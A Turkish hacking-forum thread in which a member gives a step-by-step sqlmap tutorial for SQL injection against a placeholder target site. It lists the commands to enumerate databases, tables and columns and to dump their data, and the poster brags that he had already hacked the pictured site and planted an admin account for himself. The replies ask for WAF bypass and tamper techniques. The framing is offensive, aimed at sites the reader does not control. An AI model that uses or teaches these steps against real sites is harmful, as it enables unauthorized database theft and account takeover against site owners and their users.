// SQLMap Kullanımı - Resimli Anlatım [ByBaggins] //

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
ByBaggins

ByBaggins

Kıdemli Üye
2 May 2016
2,347
1
Selamünaleyküm dostlar. Veteran hocanın sabitlik sqlmap konusu silinmiş farkettiyseniz. Ben de sqlmap kullanmayı bilmeyen arkadaşlar için aynı şekilde resimli olarak anlatmaya karar verdim. Öncelikle şunu söyleyeyim bilgisayarınızda Python2.7 ve sqlmap kurulu olmalı. Aşağıda linklerini vereceğim zaten.Fazla uzatmadan anlatmaya başlıyayım. :)

İlk olarak sırasıyla şu komutları giriyoruz :

Kod: 
[CENTER]cd..[/CENTER]
Kod: 
[CENTER]cd..[/CENTER]
Kod: 
[CENTER]cd sqlmap[/CENTER]

r2QQA1.jpg


Daha sonra şu komutu girerek veritbanı çekme işlemini başlatıyoruz. Size birtakım sorular soracaktır hepsine yes diyip enterlayın.

Kod: 
[CENTER]sqlmap.py -u http://www.hedefsite.com/index.php?id=1 --dbs[/CENTER]

Akmm4Q.jpg

Veritabanını resimdeki gibi çekecektir :

6X224k.jpg


Daha sonra şu komutu girerek istediğimiz veritabanına ait tabloları çekme işlemini başlatıyoruz.

Kod: 
[CENTER]sqlmap.py -u http://www.hedefsite.com/index.php?id=1 -D veritabanıadı --tables[/CENTER]

WQnZ2q.jpg

Daha sonra tablolar şu şekilde çekilecektir :

G0Ykb7.jpg

lW7yzk.jpg


Sonrasında ise istediğimiz tabloya ait kolonları çekme işlemini ise şu şekilde başlatıyoruz :

Kod: 
[CENTER]sqlmap.py -u http://www.hedefsite.com/index.php?id=1 -D veritabanıadı -T tabloadı --columns[/CENTER]

N1q455.jpg

Devamında kolonlar şu şekilde çekiliyor :​

XXvoo7.jpg


Sonra istediğimiz kolonlara ait datayı çekmek için şu komutu giriyoruz :

Kod: 
[CENTER]sqlmap.py -u http://www.hedefsite.com/index.php?id=1 -D veritabanıadı -T tabloadı -C kolonadı1,kolonadı2,kolonadı3 --dump[/CENTER]

WQnZE8.jpg

Ve sonunda resimde gördüğünüz gibi datalar çekiliyor:

5QdkV5.jpg


***Siteyi daha önce hacklediğim için kendi e-postama ait bir admin hesabı da açmıştım. :D ***


Ekstra olarak bu şekilde çekemediğiniz site bilgilerini AquieLL abimin şu konularını aynı şekilde uygulayarak çekmeyi deneyebilirsiniz. :) :

Kod: 
[CENTER]http://www.turkhackteam.org/web-server-guvenligi/1343023-sqlmapde-veritabanini-daha-kolay-cekme-aquiell.html
http://www.turkhackteam.org/hack-videolari/1351697-sqlmapde-veritabanini-daha-kolay-cekme-videolu-aquiell.html[/CENTER]


İNDİRME LİNKLERİ :

SQLMap :

Kod: 
[CENTER]http://sqlmap.org/[/CENTER]

Python :

Kod: 
[CENTER]https://www.python.org/ftp/python/2.7.13/python-2.7.13.msi[/CENTER]

ByBaggins / Türk Hack Team​

Saygılar...
 
Son düzenleme:
D

D4D4S

Katılımcı Üye
17 Mar 2017
857
0
Yararlı çok iyi anlatmışsın video da çekersen daha da güzel olur :)
 
#!/

#!/

Uzman üye
9 Mar 2016
1,323
2
TEM
Eline emegine saglik.
WAF bypass yollarini da anlatmalisin.
Tamper nedir ne ise yarar ? baglanti hatalari vs. bunlar onemli bilgiler
 
ByBaggins

ByBaggins

Kıdemli Üye
2 May 2016
2,347
1
Konu güncel. Bilmeyen arkadaşlar için çok iyi bir konu olduğunu düşünüyorum. Arkadaşlar yorumlarınızda sabite alınmalı mı sizce görüşünüzü belirtirseniz sevinirim.
 
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.